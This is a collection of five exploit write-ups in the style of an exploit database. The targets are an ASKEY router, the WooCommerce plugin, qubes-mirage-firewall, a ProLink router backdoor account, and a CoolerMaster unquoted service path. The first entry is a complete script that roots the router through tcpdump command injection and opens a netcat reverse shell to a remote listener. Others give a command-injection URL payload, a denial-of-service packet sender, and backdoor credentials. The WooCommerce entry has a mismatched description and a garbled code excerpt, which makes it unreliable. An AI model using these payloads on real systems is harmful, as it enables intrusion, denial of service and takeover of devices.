# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation # Date: 07-12-2022 # Exploit Author: Leonardo Nicolas Servalli # Vendor Homepage: www.askey.com # Platform: ASKEY router devices RTF3505VW-N1 # Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7 # Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md #Description: #---------- # Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials). # The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console. #Exploit: #-------- #!/usr/bin/bash if [ -z "$@" ]; then echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell " exit 0 fi for K in $(seq 1 15) # Attemps do echo "**************************************************************************************" echo "******************************** Attempt number $K ************************************" echo "**************************************************************************************" for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 & # start a background loop injecting the string ";/bin/bash" on the port 80 of the router # Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener /usr/bin/expect << EOD spawn ssh $2@$1 expect { "password: " { send "$3\r" expect ">" send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r" # filter by source port 8888 } "yes/no" { send "yes\r" #exp_continue } } set timeout 2 expect { timeout { puts "Timeout..." send "exit\r" exit 0 } "*usy*ox" { expect "#" send "rm /tmp/runme* \r" send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r" puts "Rooted !!!!!!!!!" set timeout -1 expect "NEVER_APPEARING_STRING#" # wait an infinite time to mantain the rverse shell open } } EOD done

# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE) # Date: 2022-12-07 # Author: Milad Karimi # Vendor Homepage: https://wordpress.org/plugins/woocommerce # Software Link: https://wordpress.org/plugins/woocommerce # Tested on: windows 10 , firefox # Version: 7.1.0 # CVE : N/A # Description: simple, easy to use jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down. # PoC : http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php # Vulnerabile code: 95: $classname $classname($post_id); 94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); 92: ⇓ function save($post_id, $post) 93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); 92: ⇓ function save($post_id, $post)

# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) # Date: 2022-12-04 # Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl> # Vendor Homepage: https://mirage.io/blog/MSA03 # Software Link: https://github.com/mirage/qubes-mirage-firewall/releases # Version: >= 0.8.0 & < 0.8.4 # Tested on: Qubes OS # CVE: CVE-2022-46770 #PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166 #!/usr/bin/env python3 from socket import socket, AF_INET, SOCK_DGRAM TARGET = "239.255.255.250" PORT = 5353 PAYLOAD = b'a' * 607 s = socket(AF_INET, SOCK_DGRAM) s.sendto(PAYLOAD, (TARGET, PORT))

# Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber # Date: 12/8/2022 # Exploit Author: Lawrence Amer @zux0x3a # Vendor Homepage: https://prolink2u.com/product/prs1841/ # Firmware : PRS1841 U V2 # research: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/ Description ======================== A silent privileged backdoor account discovered on the Prolink PRS1841 routers; allows attackers to gain command execution privileges to the router OS. The vulnerable account issued by the vendor was identified as "adsl" and "realtek" as the default password; attackers could use this account to access the router remotely/internally using either Telnet or FTP protocol. PoC ============================= adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli

# Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path # Date: 11/17/2022 # Exploit Author: Damian Semon Jr (Blue Team Alpha) # Version: 1.8.5 # Vendor Homepage: https://masterplus.coolermaster.com/ # Software Link: https://masterplus.coolermaster.com/ # Tested on: Windows 10 64x # Step to discover the unquoted service path: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto # Info on the service: C:\>sc qc MPService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MPService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : CoolerMaster MasterPlus Technology Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. Ex: (C:\Program.exe)